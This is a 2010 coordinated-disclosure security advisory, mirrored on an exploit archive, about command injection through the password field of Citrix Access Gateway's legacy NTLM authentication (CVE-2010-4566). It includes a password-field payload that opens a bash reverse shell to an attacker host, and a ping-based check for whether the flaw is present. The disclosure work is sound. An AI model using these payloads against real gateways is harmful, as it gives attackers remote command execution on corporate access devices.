exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix Access Gateway Command Injection

Citrix Access Gateway Command Injection
Posted Dec 21, 2010
Authored by George D. Gal | Site vsecurity.com

Citrix Access Gateway Command Injection Enterprise Edition up to 9.2-49.8 and Standard and Advanced Editions prior to 5.0 suffer from a remote command injection vulnerability.

tags | exploit, remote
advisories | CVE-2010-4566
SHA-256 | cc70050cfc786f1a1df78cc3270117077f714bea62b7947328a95fd0f7ef906a

Citrix Access Gateway Command Injection

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


VSR Security Advisory
http://www.vsecurity.com/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date: 2010-12-21
Application: Citrix Access Gateway
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity: High
Author: George D. Gal <ggal (at) vsecurity (dot) com>
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- -------------------
- From [1]:

"Citrix(R) Access Gateway(TM) is a secure application access solution that
provides administrators granular application-level control while
empowering users with remote access from anywhere. It gives IT
administrators a single point to manage access control and limit actions
within sessions based on both user identity and the endpoint device,
providing better application security, data protection, and compliance
management."

Vulnerability Overview
- ----------------------

On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within
the way user authentication credentials are handled. Under certain
configuration settings it appears that user credentials are passed as
arguments to a command line program to authenticate the user. A lack of data
validation and the mechanism in which the external program is spawned results
in the potential for command injection and arbitrary command execution on the
Access Gateway.

Vulnerability Details
- ---------------------

The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
metacharacters in the web authentication form it is possible to execute
arbitrary commands on the Access Gateway.

The following commands are executed by the ntlm_authenticator during this
process:

vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null

vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a
reverse shell to a netcat listener:

| bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 &

Using a simple ping command in the password field an attacker could use timing
attacks to verify the presence of the vulnerability:

| ping -c 10 <<HOST>>

The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticable delay easily detected by vulnerability
scanners.

Versions Affected
- -----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7.
According to the vendor this vulnerability affects all versions of Access
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of
the Access Gateway Standard and Advanced Editions prior to Access Gateway
5.0.

Vendor Response
- ---------------
The following timeline details the vendor's response to the reported issue:

2010-08-06 Citrix was provided a draft advisory.
2010-08-10 Citrix acknowledged receipt of draft advisory.
2010-08-16 VSR follow-up to determine confirmation of issue.
2010-08-16 Citrix confirmed issue.
2010-09-14 VSR follow-up to determine status of issue.
2010-09-29 VSR follow-up to determine status of issue.
2010-09-30 Citrix confirmed continued investigation of the issue.
2010-10-19 VSR follow-up to determine status of issue.
2010-10-26 Citrix verified issue only exists in NT4 authentication feature.
2010-12-01 VSR follow-up to determine status of issue.
2010-12-02 Citrix confirmed December 14th release of security bulletin.
2010-12-14 Citrix releases security bulletin.
2010-12-20 CVE assigned
2010-12-21 VSR releases advisory.


The Citrix advisory may be obtained at:
http://support.citrix.com/article/CTX127613

Recommendation
- --------------
Citrix has indicated that this vulnerability only affects legacy NT4
authentication which has been removed from the latest release of the
device firmware.

Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-4566 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
- ----------------
VSR would like to thank Citrix for the coordinated release of this advisory.

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Citrix Access Gateway
http://citrix.com/accessgateway/overview
2. Citrix Access Gateway - Vendor Security Bulletin
http://support.citrix.com/article/CTX127613

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety. This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose. Virtual Security Research, LLC nor the
author accepts any liability for any direct, indirect, or consequential loss
or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:

http://www.vsecurity.com/company/disclosure

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2010 Virtual Security Research, LLC. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk0Q3L8ACgkQQ1RSUNR+T+idEwCeN2plOLk8rWQoPY4DqAolEY5V
EbEAoJn38LPt3MEm3xvQaL6wWPbwDsUb
=b3y+
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close